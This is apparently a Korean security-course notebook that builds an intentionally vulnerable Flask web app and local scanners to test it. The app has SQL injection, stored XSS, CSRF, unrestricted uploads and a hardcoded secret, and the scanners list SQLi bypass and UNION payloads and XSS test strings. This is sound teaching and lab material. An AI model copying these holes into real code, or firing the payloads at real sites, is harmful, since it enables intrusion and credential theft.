## 디렉토리 생성

In [2]:
import os

# 프로젝트 디렉토리 생성
os.makedirs('web_security_project/vulnerable_app/templates', exist_ok=True)
os.makedirs('web_security_project/vulnerable_app/static', exist_ok=True)
os.makedirs('web_security_project/vulnerable_app/uploads', exist_ok=True)
os.makedirs('web_security_project/scanners', exist_ok=True)
os.makedirs('web_security_project/reports', exist_ok=True)
os.makedirs('web_security_project/screenshots', exist_ok=True)


# 디렉토리 구조 확인
for root, dirs, files in os.walk('web_security_project'):
    level = root.replace('web_security_project', '').count(os.sep)
    indent = ' ' * 2 * level
    print(f'{indent}{os.path.basename(root)}/')
    subindent = ' ' * 2 * (level + 1)
    for file in files:
        print(f'{subindent}{file}')

web_security_project/
  reports/
  scanners/
  screenshots/
  vulnerable_app/
    static/
    templates/
    uploads/


## init_db.py 생성

In [3]:
%%writefile web_security_project/vulnerable_app/init_db.py
import sqlite3

def init_database():
    conn = sqlite3.connect('database.db')
    cursor = conn.cursor()
    
    # 사용자 테이블
    cursor.execute('''
    CREATE TABLE IF NOT EXISTS users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE NOT NULL,
        password TEXT NOT NULL,
        email TEXT,
        role TEXT DEFAULT 'user'
    )
    ''')
    
    # 게시판 테이블
    cursor.execute('''
    CREATE TABLE IF NOT EXISTS posts (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        title TEXT NOT NULL,
        content TEXT NOT NULL,
        author TEXT NOT NULL,
        created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    )
    ''')
    
    # 파일 테이블
    cursor.execute('''
    CREATE TABLE IF NOT EXISTS files (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        filename TEXT NOT NULL,
        filepath TEXT NOT NULL,
        uploader TEXT NOT NULL,
        uploaded_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
    )
    ''')
    
    # 기본 사용자 데이터 삽입
    cursor.execute("INSERT OR IGNORE INTO users (username, password, email, role) VALUES (?, ?, ?, ?)",
                   ('admin', 'admin123', 'admin@test.com', 'admin'))
    cursor.execute("INSERT OR IGNORE INTO users (username, password, email, role) VALUES (?, ?, ?, ?)",
                   ('user1', 'password1', 'user1@test.com', 'user'))
    cursor.execute("INSERT OR IGNORE INTO users (username, password, email, role) VALUES (?, ?, ?, ?)",
                   ('testuser', 'test123', 'test@test.com', 'user'))
    
    # 기본 게시글 데이터
    cursor.execute("INSERT OR IGNORE INTO posts (title, content, author) VALUES (?, ?, ?)",
                   ('Welcome Post', 'This is a test post', 'admin'))
    cursor.execute("INSERT OR IGNORE INTO posts (title, content, author) VALUES (?, ?, ?)",
                   ('Security Notice', 'Please keep your password safe', 'admin'))
    
    conn.commit()
    conn.close()

if __name__ == '__main__':
    init_database()

Writing web_security_project/vulnerable_app/init_db.py


## 데이터베이스 초기화

In [4]:
import os
os.chdir('web_security_project/vulnerable_app')

In [5]:
!python init_db.py

In [6]:
os.chdir('../..')

## Flask 웹 애플리케이션 메인 파일

In [7]:
%%writefile web_security_project/vulnerable_app/app.py
from flask import Flask, render_template, request, redirect, url_for, session, flash, send_file
import sqlite3
import os
from werkzeug.utils import secure_filename
from datetime import datetime

app = Flask(__name__)
app.secret_key = 'vulnerable_secret_key_123'  # 취약: 하드코딩된 시크릿 키
app.config['UPLOAD_FOLDER'] = 'uploads'
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024  # 16MB

os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)

def get_db():
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# 홈페이지
@app.route('/')
def index():
    return render_template('index.html')

# 로그인 (SQL Injection 취약)
@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        
        # 취약: SQL Injection 가능
        query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
        
        conn = get_db()
        cursor = conn.cursor()
        cursor.execute(query)
        user = cursor.fetchone()
        conn.close()
        
        if user:
            session['user_id'] = user['id']
            session['username'] = user['username']
            session['role'] = user['role']
            flash('Login successful!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('Invalid credentials!', 'danger')
    
    return render_template('login.html')

# 회원가입
@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        email = request.form['email']
        
        conn = get_db()
        cursor = conn.cursor()
        try:
            cursor.execute("INSERT INTO users (username, password, email) VALUES (?, ?, ?)",
                         (username, password, email))
            conn.commit()
            flash('Registration successful! Please login.', 'success')
            return redirect(url_for('login'))
        except sqlite3.IntegrityError:
            flash('Username already exists!', 'danger')
        finally:
            conn.close()
    
    return render_template('register.html')

# 대시보드
@app.route('/dashboard')
def dashboard():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    return render_template('dashboard.html')

# 게시판 (XSS 취약)
@app.route('/board')
def board():
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM posts ORDER BY created_at DESC")
    posts = cursor.fetchall()
    conn.close()
    return render_template('board.html', posts=posts)

# 게시글 작성 (XSS 취약)
@app.route('/board/write', methods=['GET', 'POST'])
def write_post():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    if request.method == 'POST':
        title = request.form['title']
        content = request.form['content']
        
        conn = get_db()
        cursor = conn.cursor()
        # 취약: XSS 방어 없음
        cursor.execute("INSERT INTO posts (title, content, author) VALUES (?, ?, ?)",
                     (title, content, session['username']))
        conn.commit()
        conn.close()
        
        flash('Post created successfully!', 'success')
        return redirect(url_for('board'))
    
    return render_template('write_post.html')

# 검색 (SQL Injection 취약)
@app.route('/search')
def search():
    query = request.args.get('q', '')
    
    conn = get_db()
    cursor = conn.cursor()
    # 취약: SQL Injection 가능
    search_query = f"SELECT * FROM posts WHERE title LIKE '%{query}%' OR content LIKE '%{query}%'"
    cursor.execute(search_query)
    results = cursor.fetchall()
    conn.close()
    
    return render_template('search.html', results=results, query=query)

# 파일 업로드 (File Upload 취약)
@app.route('/upload', methods=['GET', 'POST'])
def upload():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    if request.method == 'POST':
        if 'file' not in request.files:
            flash('No file selected!', 'danger')
            return redirect(request.url)
        
        file = request.files['file']
        if file.filename == '':
            flash('No file selected!', 'danger')
            return redirect(request.url)
        
        # 취약: 파일 확장자 검증 없음
        filename = file.filename
        filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        file.save(filepath)
        
        conn = get_db()
        cursor = conn.cursor()
        cursor.execute("INSERT INTO files (filename, filepath, uploader) VALUES (?, ?, ?)",
                     (filename, filepath, session['username']))
        conn.commit()
        conn.close()
        
        flash('File uploaded successfully!', 'success')
        return redirect(url_for('files'))
    
    return render_template('upload.html')

# 파일 목록
@app.route('/files')
def files():
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM files ORDER BY uploaded_at DESC")
    file_list = cursor.fetchall()
    conn.close()
    return render_template('files.html', files=file_list)

# 로그아웃
@app.route('/logout')
def logout():
    session.clear()
    flash('Logged out successfully!', 'success')
    return redirect(url_for('index'))

# 프로필 수정 (CSRF 취약)
@app.route('/profile', methods=['GET', 'POST'])
def profile():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    if request.method == 'POST':
        # 취약: CSRF 토큰 없음
        email = request.form['email']
        
        conn = get_db()
        cursor = conn.cursor()
        cursor.execute("UPDATE users SET email=? WHERE id=?",
                     (email, session['user_id']))
        conn.commit()
        conn.close()
        
        flash('Profile updated successfully!', 'success')
    
    conn = get_db()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM users WHERE id=?", (session['user_id'],))
    user = cursor.fetchone()
    conn.close()
    
    return render_template('profile.html', user=user)

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=5000)

Writing web_security_project/vulnerable_app/app.py


## HTML 템플릿 파일들 생성

### 레이아웃 

In [8]:
%%writefile web_security_project/vulnerable_app/templates/base.html
<!DOCTYPE html>
<html lang="ko">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>{% block title %}Vulnerable Web App{% endblock %}</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body { padding-top: 60px; }
        .navbar-brand { font-weight: bold; }
    </style>
</head>
<body>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark fixed-top">
        <div class="container">
            <a class="navbar-brand" href="/">🔓 Vulnerable Web</a>
            <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarNav">
                <ul class="navbar-nav ms-auto">
                    <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                    <li class="nav-item"><a class="nav-link" href="/board">Board</a></li>
                    <li class="nav-item"><a class="nav-link" href="/search">Search</a></li>
                    {% if session.username %}
                        <li class="nav-item"><a class="nav-link" href="/dashboard">Dashboard</a></li>
                        <li class="nav-item"><a class="nav-link" href="/upload">Upload</a></li>
                        <li class="nav-item"><a class="nav-link" href="/files">Files</a></li>
                        <li class="nav-item"><a class="nav-link" href="/profile">Profile</a></li>
                        <li class="nav-item"><a class="nav-link" href="/logout">Logout ({{ session.username }})</a></li>
                    {% else %}
                        <li class="nav-item"><a class="nav-link" href="/login">Login</a></li>
                        <li class="nav-item"><a class="nav-link" href="/register">Register</a></li>
                    {% endif %}
                </ul>
            </div>
        </div>
    </nav>

    <div class="container mt-4">
        {% with messages = get_flashed_messages(with_categories=true) %}
            {% if messages %}
                {% for category, message in messages %}
                    <div class="alert alert-{{ category }} alert-dismissible fade show" role="alert">
                        {{ message }}
                        <button type="button" class="btn-close" data-bs-dismiss="alert"></button>
                    </div>
                {% endfor %}
            {% endif %}
        {% endwith %}

        {% block content %}{% endblock %}
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>

Writing web_security_project/vulnerable_app/templates/base.html


### 홈페이지(index.html)

In [9]:
%%writefile web_security_project/vulnerable_app/templates/index.html
{% extends "base.html" %}

{% block title %}Home - Vulnerable Web App{% endblock %}

{% block content %}
<div class="jumbotron bg-light p-5 rounded">
    <h1 class="display-4">🔓 취약한 웹 애플리케이션</h1>
    <p class="lead">보안 취약점 테스트를 위한 교육용 웹사이트입니다.</p>
    <hr class="my-4">
    <p>이 웹사이트는 다음과 같은 취약점을 포함하고 있습니다:</p>
    <ul>
        <li><strong>SQL Injection</strong> - 로그인, 검색 기능</li>
        <li><strong>XSS (Cross-Site Scripting)</strong> - 게시판 기능</li>
        <li><strong>CSRF (Cross-Site Request Forgery)</strong> - 프로필 수정 기능</li>
        <li><strong>File Upload Vulnerability</strong> - 파일 업로드 기능</li>
    </ul>
    <p class="text-danger"><strong>⚠️ 경고:</strong> 이 사이트는 교육 목적으로만 사용되어야 합니다.</p>
    <a class="btn btn-primary btn-lg" href="/login" role="button">시작하기</a>
</div>

<div class="row mt-5">
    <div class="col-md-4">
        <div class="card">
            <div class="card-body">
                <h5 class="card-title">📝 게시판</h5>
                <p class="card-text">XSS 취약점이 있는 게시판을 테스트해보세요.</p>
                <a href="/board" class="btn btn-outline-primary">바로가기</a>
            </div>
        </div>
    </div>
    <div class="col-md-4">
        <div class="card">
            <div class="card-body">
                <h5 class="card-title">🔍 검색</h5>
                <p class="card-text">SQL Injection이 가능한 검색 기능입니다.</p>
                <a href="/search" class="btn btn-outline-primary">바로가기</a>
            </div>
        </div>
    </div>
    <div class="col-md-4">
        <div class="card">
            <div class="card-body">
                <h5 class="card-title">📤 파일 업로드</h5>
                <p class="card-text">파일 업로드 취약점을 테스트해보세요.</p>
                <a href="/upload" class="btn btn-outline-primary">바로가기</a>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/index.html


### 로그인 페이지

In [10]:
%%writefile web_security_project/vulnerable_app/templates/login.html
{% extends "base.html" %}

{% block title %}Login{% endblock %}

{% block content %}
<div class="row justify-content-center">
    <div class="col-md-6">
        <div class="card">
            <div class="card-header bg-primary text-white">
                <h4 class="mb-0">🔐 로그인</h4>
            </div>
            <div class="card-body">
                <div class="alert alert-warning">
                    <strong>⚠️ SQL Injection 취약점:</strong> 이 로그인 폼은 SQL Injection에 취약합니다.
                </div>
                
                <form method="POST" action="/login">
                    <div class="mb-3">
                        <label for="username" class="form-label">Username</label>
                        <input type="text" class="form-control" id="username" name="username" required>
                    </div>
                    <div class="mb-3">
                        <label for="password" class="form-label">Password</label>
                        <input type="password" class="form-control" id="password" name="password" required>
                    </div>
                    <button type="submit" class="btn btn-primary w-100">Login</button>
                </form>
                
                <hr>
                <p class="text-center mb-0">
                    계정이 없으신가요? <a href="/register">회원가입</a>
                </p>
                
                <div class="mt-3">
                    <small class="text-muted">
                        <strong>테스트 계정:</strong><br>
                        - admin / admin123<br>
                        - user1 / password1
                    </small>
                </div>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/login.html


### 회원가입 페이지 (register.html) 

In [11]:
%%writefile web_security_project/vulnerable_app/templates/register.html
{% extends "base.html" %}

{% block title %}Register{% endblock %}

{% block content %}
<div class="row justify-content-center">
    <div class="col-md-6">
        <div class="card">
            <div class="card-header bg-success text-white">
                <h4 class="mb-0">📝 회원가입</h4>
            </div>
            <div class="card-body">
                <form method="POST" action="/register">
                    <div class="mb-3">
                        <label for="username" class="form-label">Username</label>
                        <input type="text" class="form-control" id="username" name="username" required>
                    </div>
                    <div class="mb-3">
                        <label for="password" class="form-label">Password</label>
                        <input type="password" class="form-control" id="password" name="password" required>
                    </div>
                    <div class="mb-3">
                        <label for="email" class="form-label">Email</label>
                        <input type="email" class="form-control" id="email" name="email" required>
                    </div>
                    <button type="submit" class="btn btn-success w-100">Register</button>
                </form>
                <hr>
                <p class="text-center mb-0">
                    이미 계정이 있으신가요? <a href="/login">로그인</a>
                </p>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/register.html


### 대시보드 (dashboard.html)

In [12]:
%%writefile web_security_project/vulnerable_app/templates/dashboard.html
{% extends "base.html" %}

{% block title %}Dashboard{% endblock %}

{% block content %}
<h2>👋 환영합니다, {{ session.username }}님!</h2>
<p class="lead">Role: <span class="badge bg-info">{{ session.role }}</span></p>

<div class="row mt-4">
    <div class="col-md-4">
        <div class="card mb-3">
            <div class="card-body">
                <h5 class="card-title">📝 게시판</h5>
                <p class="card-text">게시글을 작성하고 조회할 수 있습니다.</p>
                <a href="/board" class="btn btn-primary">게시판 이동</a>
            </div>
        </div>
    </div>
    <div class="col-md-4">
        <div class="card mb-3">
            <div class="card-body">
                <h5 class="card-title">📤 파일 업로드</h5>
                <p class="card-text">파일을 업로드하고 관리할 수 있습니다.</p>
                <a href="/upload" class="btn btn-primary">업로드 이동</a>
            </div>
        </div>
    </div>
    <div class="col-md-4">
        <div class="card mb-3">
            <div class="card-body">
                <h5 class="card-title">👤 프로필</h5>
                <p class="card-text">프로필 정보를 수정할 수 있습니다.</p>
                <a href="/profile" class="btn btn-primary">프로필 이동</a>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/dashboard.html


### 게시판 목록 (board.html)

In [13]:
%%writefile web_security_project/vulnerable_app/templates/board.html
{% extends "base.html" %}

{% block title %}Board{% endblock %}

{% block content %}
<div class="d-flex justify-content-between align-items-center mb-4">
    <h2>📝 게시판</h2>
    {% if session.username %}
        <a href="/board/write" class="btn btn-primary">글쓰기</a>
    {% endif %}
</div>

<div class="alert alert-warning">
    <strong>⚠️ XSS 취약점:</strong> 이 게시판은 XSS 공격에 취약합니다. 게시글에 스크립트가 실행될 수 있습니다.
</div>

<div class="table-responsive">
    <table class="table table-striped table-hover">
        <thead class="table-dark">
            <tr>
                <th width="10%">번호</th>
                <th width="50%">제목</th>
                <th width="20%">작성자</th>
                <th width="20%">작성일</th>
            </tr>
        </thead>
        <tbody>
            {% for post in posts %}
            <tr>
                <td>{{ post.id }}</td>
                <td>
                    <!-- 취약: XSS 방어 없음 (|safe 사용) -->
                    {{ post.title|safe }}
                </td>
                <td>{{ post.author }}</td>
                <td>{{ post.created_at }}</td>
            </tr>
            <tr>
                <td colspan="4" class="bg-light">
                    <!-- 취약: XSS 방어 없음 -->
                    <div class="p-2">{{ post.content|safe }}</div>
                </td>
            </tr>
            {% endfor %}
        </tbody>
    </table>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/board.html


### 게시글 작성 (write_post.html)

In [14]:
%%writefile web_security_project/vulnerable_app/templates/write_post.html
{% extends "base.html" %}

{% block title %}Write Post{% endblock %}

{% block content %}
<div class="row justify-content-center">
    <div class="col-md-8">
        <div class="card">
            <div class="card-header bg-primary text-white">
                <h4 class="mb-0">✍️ 게시글 작성</h4>
            </div>
            <div class="card-body">
                <div class="alert alert-info">
                    <strong>💡 XSS 테스트:</strong> 제목이나 내용에 <code>&lt;script&gt;alert('XSS')&lt;/script&gt;</code> 같은 스크립트를 입력해보세요.
                </div>
                
                <form method="POST" action="/board/write">
                    <div class="mb-3">
                        <label for="title" class="form-label">제목</label>
                        <input type="text" class="form-control" id="title" name="title" required>
                    </div>
                    <div class="mb-3">
                        <label for="content" class="form-label">내용</label>
                        <textarea class="form-control" id="content" name="content" rows="10" required></textarea>
                    </div>
                    <div class="d-grid gap-2 d-md-flex justify-content-md-end">
                        <a href="/board" class="btn btn-secondary">취소</a>
                        <button type="submit" class="btn btn-primary">작성</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/write_post.html


### 검색 페이지 (search.html)

In [15]:
%%writefile web_security_project/vulnerable_app/templates/search.html
{% extends "base.html" %}

{% block title %}Search{% endblock %}

{% block content %}
<h2>🔍 검색</h2>

<div class="alert alert-warning mb-4">
    <strong>⚠️ SQL Injection 취약점:</strong> 이 검색 기능은 SQL Injection에 취약합니다.
</div>

<form method="GET" action="/search" class="mb-4">
    <div class="input-group input-group-lg">
        <input type="text" class="form-control" name="q" placeholder="검색어를 입력하세요..." value="{{ query }}">
        <button class="btn btn-primary" type="submit">검색</button>
    </div>
    <small class="text-muted">
        <strong>SQL Injection 테스트:</strong> 
        <code>' OR '1'='1</code> 또는 
        <code>' UNION SELECT username, password, email, role FROM users--</code>
    </small>
</form>

{% if query %}
<h4>검색 결과: "{{ query }}"</h4>
<div class="table-responsive">
    <table class="table table-striped">
        <thead class="table-dark">
            <tr>
                <th>번호</th>
                <th>제목</th>
                <th>내용</th>
                <th>작성자</th>
            </tr>
        </thead>
        <tbody>
            {% for result in results %}
            <tr>
                <td>{{ result.id }}</td>
                <td>{{ result.title }}</td>
                <td>{{ result.content }}</td>
                <td>{{ result.author }}</td>
            </tr>
            {% else %}
            <tr>
                <td colspan="4" class="text-center">검색 결과가 없습니다.</td>
            </tr>
            {% endfor %}
        </tbody>
    </table>
</div>
{% endif %}
{% endblock %}

Writing web_security_project/vulnerable_app/templates/search.html


### 파일 업로드 (upload.html)


In [16]:
%%writefile web_security_project/vulnerable_app/templates/upload.html
{% extends "base.html" %}

{% block title %}Upload File{% endblock %}

{% block content %}
<div class="row justify-content-center">
    <div class="col-md-8">
        <div class="card">
            <div class="card-header bg-primary text-white">
                <h4 class="mb-0">📤 파일 업로드</h4>
            </div>
            <div class="card-body">
                <div class="alert alert-danger">
                    <strong>⚠️ File Upload 취약점:</strong> 이 파일 업로드는 확장자 검증이 없습니다. 
                    악성 파일(.php, .jsp, .asp 등)을 업로드할 수 있습니다.
                </div>
                
                <form method="POST" action="/upload" enctype="multipart/form-data">
                    <div class="mb-3">
                        <label for="file" class="form-label">파일 선택</label>
                        <input type="file" class="form-control" id="file" name="file" required>
                        <small class="text-muted">모든 파일 형식이 허용됩니다.</small>
                    </div>
                    <div class="d-grid gap-2 d-md-flex justify-content-md-end">
                        <a href="/files" class="btn btn-secondary">파일 목록</a>
                        <button type="submit" class="btn btn-primary">업로드</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/upload.html


### 파일 목록 (files.html)

In [17]:
%%writefile web_security_project/vulnerable_app/templates/files.html
{% extends "base.html" %}

{% block title %}Files{% endblock %}

{% block content %}
<div class="d-flex justify-content-between align-items-center mb-4">
    <h2>📁 업로드된 파일</h2>
    <a href="/upload" class="btn btn-primary">파일 업로드</a>
</div>

<div class="table-responsive">
    <table class="table table-striped table-hover">
        <thead class="table-dark">
            <tr>
                <th width="10%">번호</th>
                <th width="40%">파일명</th>
                <th width="25%">업로더</th>
                <th width="25%">업로드 날짜</th>
            </tr>
        </thead>
        <tbody>
            {% for file in files %}
            <tr>
                <td>{{ file.id }}</td>
                <td>{{ file.filename }}</td>
                <td>{{ file.uploader }}</td>
                <td>{{ file.uploaded_at }}</td>
            </tr>
            {% else %}
            <tr>
                <td colspan="4" class="text-center">업로드된 파일이 없습니다.</td>
            </tr>
            {% endfor %}
        </tbody>
    </table>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/files.html


### 프로필 페이지 (profile.html)

In [18]:
%%writefile web_security_project/vulnerable_app/templates/profile.html
{% extends "base.html" %}

{% block title %}Profile{% endblock %}

{% block content %}
<div class="row justify-content-center">
    <div class="col-md-8">
        <div class="card">
            <div class="card-header bg-info text-white">
                <h4 class="mb-0">👤 프로필</h4>
            </div>
            <div class="card-body">
                <div class="alert alert-danger">
                    <strong>⚠️ CSRF 취약점:</strong> 이 폼은 CSRF 토큰이 없습니다. 
                    외부 사이트에서 이 폼을 제출할 수 있습니다.
                </div>
                
                <form method="POST" action="/profile">
                    <div class="mb-3">
                        <label class="form-label">Username</label>
                        <input type="text" class="form-control" value="{{ user.username }}" disabled>
                    </div>
                    <div class="mb-3">
                        <label class="form-label">Role</label>
                        <input type="text" class="form-control" value="{{ user.role }}" disabled>
                    </div>
                    <div class="mb-3">
                        <label for="email" class="form-label">Email</label>
                        <input type="email" class="form-control" id="email" name="email" value="{{ user.email }}" required>
                    </div>
                    <button type="submit" class="btn btn-primary">프로필 업데이트</button>
                </form>
            </div>
        </div>
    </div>
</div>
{% endblock %}

Writing web_security_project/vulnerable_app/templates/profile.html


In [44]:
import subprocess
import time
import os

# 현재 디렉토리 저장
original_dir = os.getcwd()

# Flask 서버를 백그라운드로 실행
os.chdir('web_security_project/vulnerable_app')

# Windows용 백그라운드 실행
process = subprocess.Popen(
    ['python', 'app.py'],
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True
)

# 원래 디렉토리로 복귀
os.chdir(original_dir)

print("Flask 서버가 백그라운드에서 시작되었습니다!")
print(f"Process ID: {process.pid}")
print("\n브라우저에서 http://localhost:5000 접속하세요")
print("\n서버를 중지하려면 다음 셀을 실행하세요:")

# 서버가 시작될 시간을 줌
time.sleep(3)

Flask 서버가 백그라운드에서 시작되었습니다!
Process ID: 12280

브라우저에서 http://localhost:5000 접속하세요

서버를 중지하려면 다음 셀을 실행하세요:


In [43]:
# Flask 서버 중지
import os
import signal

try:
    process.terminate()
    print("Flask 서버가 종료되었습니다.")
except:
    print("서버 프로세스를 찾을 수 없습니다.")
    print("수동으로 종료하려면: Ctrl+C 또는 작업 관리자에서 python.exe 프로세스 종료")

Flask 서버가 종료되었습니다.


## 취약점 자동 진단 스크립트 개발

### SQL Injection 스캐너

In [20]:
%%writefile web_security_project/scanners/sql_injection_scanner.py
import requests
from datetime import datetime
import re

class SQLInjectionScanner:
    def __init__(self, base_url):
        self.base_url = base_url
        self.vulnerabilities = []
        
        # SQL Injection 테스트 페이로드
        self.payloads = [
            "' OR '1'='1",
            "' OR '1'='1' --",
            "' OR '1'='1' /*",
            "admin' --",
            "admin' #",
            "' UNION SELECT NULL--",
            "' UNION SELECT username, password FROM users--",
            "1' AND '1'='2",
        ]
        
        # SQL 에러 패턴
        self.error_patterns = [
            r"SQL syntax",
            r"mysql_fetch",
            r"SQLite",
            r"sqlite3.OperationalError",
            r"unexpected end of SQL command",
            r"Warning: mysql",
            r"valid MySQL result",
            r"MySqlClient",
        ]
    
    def test_login_form(self):
        """로그인 폼 SQL Injection 테스트"""
        print("\n[*] Testing Login Form for SQL Injection...")
        
        for payload in self.payloads:
            data = {
                'username': payload,
                'password': 'test'
            }
            
            try:
                response = requests.post(
                    f"{self.base_url}/login",
                    data=data,
                    allow_redirects=False
                )
                
                # 로그인 성공 여부 확인 (리다이렉트 또는 세션)
                if response.status_code == 302 or 'dashboard' in response.text.lower():
                    self.vulnerabilities.append({
                        'type': 'SQL Injection',
                        'location': '/login',
                        'payload': payload,
                        'severity': 'HIGH',
                        'description': f"SQL Injection in login form with payload: {payload}"
                    })
                    print(f"  [!] VULNERABLE: {payload}")
                
                # SQL 에러 메시지 확인
                for pattern in self.error_patterns:
                    if re.search(pattern, response.text, re.IGNORECASE):
                        self.vulnerabilities.append({
                            'type': 'SQL Injection (Error-based)',
                            'location': '/login',
                            'payload': payload,
                            'severity': 'HIGH',
                            'description': f"SQL error message detected: {pattern}"
                        })
                        print(f"  [!] SQL ERROR FOUND: {pattern}")
                        break
                        
            except Exception as e:
                print(f"  [-] Error testing payload {payload}: {str(e)}")
    
    def test_search_function(self):
        """검색 기능 SQL Injection 테스트"""
        print("\n[*] Testing Search Function for SQL Injection...")
        
        for payload in self.payloads:
            try:
                response = requests.get(
                    f"{self.base_url}/search",
                    params={'q': payload}
                )
                
                # SQL 에러 메시지 확인
                for pattern in self.error_patterns:
                    if re.search(pattern, response.text, re.IGNORECASE):
                        self.vulnerabilities.append({
                            'type': 'SQL Injection (Error-based)',
                            'location': '/search',
                            'payload': payload,
                            'severity': 'HIGH',
                            'description': f"SQL error in search with payload: {payload}"
                        })
                        print(f"  [!] VULNERABLE: {payload}")
                        break
                
                # UNION 기반 공격 성공 여부
                if 'UNION' in payload and len(response.text) > 1000:
                    self.vulnerabilities.append({
                        'type': 'SQL Injection (UNION-based)',
                        'location': '/search',
                        'payload': payload,
                        'severity': 'CRITICAL',
                        'description': f"UNION-based SQL Injection possible"
                    })
                    print(f"  [!] UNION INJECTION POSSIBLE: {payload}")
                    
            except Exception as e:
                print(f"  [-] Error testing payload {payload}: {str(e)}")
    
    def generate_report(self):
        """리포트 생성"""
        report = "\n" + "="*60 + "\n"
        report += "SQL INJECTION SCAN REPORT\n"
        report += "="*60 + "\n"
        report += f"Scan Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
        report += f"Target: {self.base_url}\n"
        report += f"Total Vulnerabilities Found: {len(self.vulnerabilities)}\n"
        report += "="*60 + "\n\n"
        
        if self.vulnerabilities:
            for i, vuln in enumerate(self.vulnerabilities, 1):
                report += f"{i}. [{vuln['severity']}] {vuln['type']}\n"
                report += f"   Location: {vuln['location']}\n"
                report += f"   Payload: {vuln['payload']}\n"
                report += f"   Description: {vuln['description']}\n\n"
        else:
            report += "No SQL Injection vulnerabilities found.\n"
        
        return report
    
    def scan(self):
        """전체 스캔 실행"""
        print(f"\n[*] Starting SQL Injection Scan on {self.base_url}")
        print("="*60)
        
        self.test_login_form()
        self.test_search_function()
        
        report = self.generate_report()
        print(report)
        
        # 리포트 파일 저장
        with open('../reports/sql_injection_report.txt', 'w', encoding='utf-8') as f:
            f.write(report)
        
        print(f"[+] Report saved to: ../reports/sql_injection_report.txt")
        
        return self.vulnerabilities

if __name__ == '__main__':
    scanner = SQLInjectionScanner('http://localhost:5000')
    scanner.scan()

Writing web_security_project/scanners/sql_injection_scanner.py


In [24]:
# 스캐너 실행

%cd web_security_project/scanners
!python sql_injection_scanner.py
%cd ../..

C:\Users\ghwns\HJ_git\SK_Shieldus_rookies_28\projects\week_9\web_security_project\vulnerable_app\web_security_project\scanners

[*] Starting SQL Injection Scan on http://localhost:5000

[*] Testing Login Form for SQL Injection...
  [!] VULNERABLE: ' OR '1'='1' --
  [!] VULNERABLE: ' OR '1'='1' /*
  [!] VULNERABLE: admin' --
  [!] SQL ERROR FOUND: SQLite
  [!] SQL ERROR FOUND: SQLite
  [!] SQL ERROR FOUND: SQLite

[*] Testing Search Function for SQL Injection...
  [!] VULNERABLE: admin' #
  [!] VULNERABLE: ' UNION SELECT NULL--
  [!] UNION INJECTION POSSIBLE: ' UNION SELECT NULL--
  [!] VULNERABLE: ' UNION SELECT username, password FROM users--
  [!] UNION INJECTION POSSIBLE: ' UNION SELECT username, password FROM users--

SQL INJECTION SCAN REPORT
Scan Date: 2025-12-28 14:11:16
Target: http://localhost:5000
Total Vulnerabilities Found: 11

1. [HIGH] SQL Injection
   Location: /login
   Payload: ' OR '1'='1' --
   Description: SQL Injection in login form with payload: ' OR '1'='1' --

2

## xss 스캐너 진단 스크립트

In [25]:
%%writefile web_security_project/scanners/xss_scanner.py
import requests
from datetime import datetime
from bs4 import BeautifulSoup

class XSSScanner:
    def __init__(self, base_url):
        self.base_url = base_url
        self.vulnerabilities = []
        self.session = requests.Session()
        
        # XSS 테스트 페이로드
        self.payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg/onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "<iframe src='javascript:alert(\"XSS\")'></iframe>",
            "<body onload=alert('XSS')>",
        ]
    
    def login(self):
        """로그인 (게시판 작성을 위해)"""
        print("[*] Logging in...")
        data = {'username': 'admin', 'password': 'admin123'}
        response = self.session.post(f"{self.base_url}/login", data=data)
        if 'dashboard' in response.url or response.status_code == 302:
            print("  [+] Login successful")
            return True
        return False
    
